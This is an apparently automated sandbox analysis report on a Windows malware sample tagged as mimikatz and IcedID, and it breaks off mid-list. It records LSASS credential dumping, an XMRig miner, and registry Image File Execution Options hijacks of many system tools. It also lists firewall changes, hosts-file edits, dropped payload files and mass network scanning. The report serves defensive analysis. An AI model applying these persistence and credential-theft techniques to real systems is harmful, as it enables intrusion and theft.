Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
23-11-2024 18:05
Behavioral task
behavioral1
Sample
2024-11-23_53fbb89102d0135e1e2073ceb51d440c_hacktools_icedid_mimikatz.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2024-11-23_53fbb89102d0135e1e2073ceb51d440c_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2024-11-23_53fbb89102d0135e1e2073ceb51d440c_hacktools_icedid_mimikatz.exe
-
Size
9.7MB
-
MD5
53fbb89102d0135e1e2073ceb51d440c
-
SHA1
2f8ebb192337636c7a9d782b363d5795dc8fae78
-
SHA256
19081974eafe0d9da4f4725d34b22409aa70515d99d80797def35f751fe00105
-
SHA512
2c8bc759a752dcfd6468467d308ee4b6b0bc9933fab128229d02e5fc514afe1303951da1576e89621f22a61d85674e3933bc37c97a5292d64a75eeb86044dd90
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 3892 created 1688 3892 bmesabc.exe 37 -
Xmrig family
-
Contacts a large (20624) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
resource yara_rule behavioral2/memory/1936-178-0x00007FF7A27D0000-0x00007FF7A28F0000-memory.dmp xmrig behavioral2/memory/1936-183-0x00007FF7A27D0000-0x00007FF7A28F0000-memory.dmp xmrig behavioral2/memory/1936-203-0x00007FF7A27D0000-0x00007FF7A28F0000-memory.dmp xmrig behavioral2/memory/1936-212-0x00007FF7A27D0000-0x00007FF7A28F0000-memory.dmp xmrig behavioral2/memory/1936-221-0x00007FF7A27D0000-0x00007FF7A28F0000-memory.dmp xmrig behavioral2/memory/1936-236-0x00007FF7A27D0000-0x00007FF7A28F0000-memory.dmp xmrig behavioral2/memory/1936-249-0x00007FF7A27D0000-0x00007FF7A28F0000-memory.dmp xmrig behavioral2/memory/1936-498-0x00007FF7A27D0000-0x00007FF7A28F0000-memory.dmp xmrig behavioral2/memory/1936-499-0x00007FF7A27D0000-0x00007FF7A28F0000-memory.dmp xmrig behavioral2/memory/1936-641-0x00007FF7A27D0000-0x00007FF7A28F0000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/2364-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/2364-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x0008000000023cb9-6.dat mimikatz behavioral2/memory/1328-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/4988-138-0x00007FF7935F0000-0x00007FF7936DE000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts bmesabc.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts bmesabc.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe bmesabc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bmesabc.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 4580 netsh.exe 3576 netsh.exe -
Executes dropped EXE 28 IoCs
pid Process 1328 bmesabc.exe 3892 bmesabc.exe 2144 wpcap.exe 3096 vrguwycnn.exe 4988 vfshost.exe 2324 nbriuecau.exe 4160 xohudmc.exe 2676 nspfoo.exe 1936 ysiisu.exe 3932 nbriuecau.exe 408 nbriuecau.exe 4420 nbriuecau.exe 32 nbriuecau.exe 4608 nbriuecau.exe 2200 nbriuecau.exe 5048 nbriuecau.exe 3400 nbriuecau.exe 3036 nbriuecau.exe 2516 nbriuecau.exe 3120 nbriuecau.exe 1172 nbriuecau.exe 3976 nbriuecau.exe 400 nbriuecau.exe 3012 nbriuecau.exe 1120 nbriuecau.exe 3868 bmesabc.exe 2840 nbriuecau.exe 5116 lkinngyeb.exe -
Loads dropped DLL 12 IoCs
pid Process 2144 wpcap.exe 2144 wpcap.exe 2144 wpcap.exe 2144 wpcap.exe 2144 wpcap.exe 2144 wpcap.exe 2144 wpcap.exe 2144 wpcap.exe 2144 wpcap.exe 3096 vrguwycnn.exe 3096 vrguwycnn.exe 3096 vrguwycnn.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 68 ifconfig.me 69 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft bmesabc.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\nspfoo.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\nspfoo.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 bmesabc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE bmesabc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies bmesabc.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 bmesabc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\088D7AA6D7DCA369223412E8DEF831B8 bmesabc.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\088D7AA6D7DCA369223412E8DEF831B8 bmesabc.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache bmesabc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData bmesabc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content bmesabc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 bmesabc.exe -
resource yara_rule behavioral2/files/0x0007000000023d18-134.dat upx behavioral2/memory/4988-135-0x00007FF7935F0000-0x00007FF7936DE000-memory.dmp upx behavioral2/memory/4988-138-0x00007FF7935F0000-0x00007FF7936DE000-memory.dmp upx behavioral2/files/0x0007000000023d23-141.dat upx behavioral2/memory/2324-142-0x00007FF75AED0000-0x00007FF75AF2B000-memory.dmp upx behavioral2/memory/2324-160-0x00007FF75AED0000-0x00007FF75AF2B000-memory.dmp upx behavioral2/files/0x0007000000023d20-164.dat upx behavioral2/memory/1936-165-0x00007FF7A27D0000-0x00007FF7A28F0000-memory.dmp upx behavioral2/memory/3932-171-0x00007FF75AED0000-0x00007FF75AF2B000-memory.dmp upx behavioral2/memory/408-175-0x00007FF75AED0000-0x00007FF75AF2B000-memory.dmp upx behavioral2/memory/1936-178-0x00007FF7A27D0000-0x00007FF7A28F0000-memory.dmp upx behavioral2/memory/4420-180-0x00007FF75AED0000-0x00007FF75AF2B000-memory.dmp upx behavioral2/memory/1936-183-0x00007FF7A27D0000-0x00007FF7A28F0000-memory.dmp upx behavioral2/memory/32-185-0x00007FF75AED0000-0x00007FF75AF2B000-memory.dmp upx behavioral2/memory/4608-189-0x00007FF75AED0000-0x00007FF75AF2B000-memory.dmp upx behavioral2/memory/2200-193-0x00007FF75AED0000-0x00007FF75AF2B000-memory.dmp upx behavioral2/memory/5048-197-0x00007FF75AED0000-0x00007FF75AF2B000-memory.dmp upx behavioral2/memory/3400-201-0x00007FF75AED0000-0x00007FF75AF2B000-memory.dmp upx behavioral2/memory/1936-203-0x00007FF7A27D0000-0x00007FF7A28F0000-memory.dmp upx behavioral2/memory/3036-206-0x00007FF75AED0000-0x00007FF75AF2B000-memory.dmp upx behavioral2/memory/2516-210-0x00007FF75AED0000-0x00007FF75AF2B000-memory.dmp upx behavioral2/memory/1936-212-0x00007FF7A27D0000-0x00007FF7A28F0000-memory.dmp upx behavioral2/memory/3120-215-0x00007FF75AED0000-0x00007FF75AF2B000-memory.dmp upx behavioral2/memory/1172-219-0x00007FF75AED0000-0x00007FF75AF2B000-memory.dmp upx behavioral2/memory/1936-221-0x00007FF7A27D0000-0x00007FF7A28F0000-memory.dmp upx behavioral2/memory/3976-224-0x00007FF75AED0000-0x00007FF75AF2B000-memory.dmp upx behavioral2/memory/400-228-0x00007FF75AED0000-0x00007FF75AF2B000-memory.dmp upx behavioral2/memory/3012-231-0x00007FF75AED0000-0x00007FF75AF2B000-memory.dmp upx behavioral2/memory/1120-233-0x00007FF75AED0000-0x00007FF75AF2B000-memory.dmp upx behavioral2/memory/1936-236-0x00007FF7A27D0000-0x00007FF7A28F0000-memory.dmp upx behavioral2/memory/2840-238-0x00007FF75AED0000-0x00007FF75AF2B000-memory.dmp upx behavioral2/memory/1936-249-0x00007FF7A27D0000-0x00007FF7A28F0000-memory.dmp upx behavioral2/memory/1936-498-0x00007FF7A27D0000-0x00007FF7A28F0000-memory.dmp upx behavioral2/memory/1936-499-0x00007FF7A27D0000-0x00007FF7A28F0000-memory.dmp upx behavioral2/memory/1936-641-0x00007FF7A27D0000-0x00007FF7A28F0000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\tqgibwews\UnattendGC\specials\zlib1.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\svschost.exe bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\spoolsrv.exe bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\vimpcsvc.xml bmesabc.exe File opened for modification C:\Windows\bisbgtln\svschost.xml bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\docmicfg.xml bmesabc.exe File created C:\Windows\bisbgtln\svschost.xml bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\Shellcode.ini bmesabc.exe File created C:\Windows\tqgibwews\cuincnwui\Packet.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\coli-0.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\libxml2.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\AppCapture64.dll bmesabc.exe File created C:\Windows\tqgibwews\cuincnwui\wpcap.dll bmesabc.exe File created C:\Windows\tqgibwews\cuincnwui\lkinngyeb.exe bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\crli-0.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\xdvl-0.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\spoolsrv.xml bmesabc.exe File opened for modification C:\Windows\bisbgtln\spoolsrv.xml bmesabc.exe File created C:\Windows\ime\bmesabc.exe bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\trfo-2.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\vimpcsvc.exe bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\tibe-2.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\spoolsrv.xml bmesabc.exe File opened for modification C:\Windows\bisbgtln\vimpcsvc.xml bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\exma-1.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\posh-0.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\ucl.dll bmesabc.exe File opened for modification C:\Windows\bisbgtln\docmicfg.xml bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\docmicfg.exe bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\schoedcl.exe bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\schoedcl.xml bmesabc.exe File created C:\Windows\tqgibwews\upbdrjv\swrpwe.exe bmesabc.exe File created C:\Windows\tqgibwews\cuincnwui\ip.txt bmesabc.exe File created C:\Windows\bisbgtln\bmesabc.exe 2024-11-23_53fbb89102d0135e1e2073ceb51d440c_hacktools_icedid_mimikatz.exe File opened for modification C:\Windows\tqgibwews\cuincnwui\Packet.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\cnli-1.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\libeay32.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\trch-1.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\vimpcsvc.xml bmesabc.exe File opened for modification C:\Windows\tqgibwews\Corporate\log.txt cmd.exe File opened for modification C:\Windows\tqgibwews\cuincnwui\Result.txt lkinngyeb.exe File created C:\Windows\tqgibwews\UnattendGC\specials\tucl-1.dll bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\svschost.xml bmesabc.exe File created C:\Windows\bisbgtln\schoedcl.xml bmesabc.exe File created C:\Windows\tqgibwews\Corporate\mimidrv.sys bmesabc.exe File created C:\Windows\tqgibwews\cuincnwui\scan.bat bmesabc.exe File created C:\Windows\tqgibwews\cuincnwui\vrguwycnn.exe bmesabc.exe File created C:\Windows\bisbgtln\docmicfg.xml bmesabc.exe File opened for modification C:\Windows\bisbgtln\bmesabc.exe 2024-11-23_53fbb89102d0135e1e2073ceb51d440c_hacktools_icedid_mimikatz.exe File created C:\Windows\tqgibwews\UnattendGC\svschost.xml bmesabc.exe File created C:\Windows\bisbgtln\spoolsrv.xml bmesabc.exe File created C:\Windows\bisbgtln\vimpcsvc.xml bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\AppCapture32.dll bmesabc.exe File created C:\Windows\tqgibwews\Corporate\mimilib.dll bmesabc.exe File created C:\Windows\tqgibwews\cuincnwui\wpcap.exe bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\docmicfg.xml bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\schoedcl.xml bmesabc.exe File created C:\Windows\tqgibwews\Corporate\vfshost.exe bmesabc.exe File created C:\Windows\tqgibwews\UnattendGC\specials\ssleay32.dll bmesabc.exe File opened for modification C:\Windows\bisbgtln\schoedcl.xml bmesabc.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3036 sc.exe 4640 sc.exe 5000 sc.exe 624 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bmesabc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened 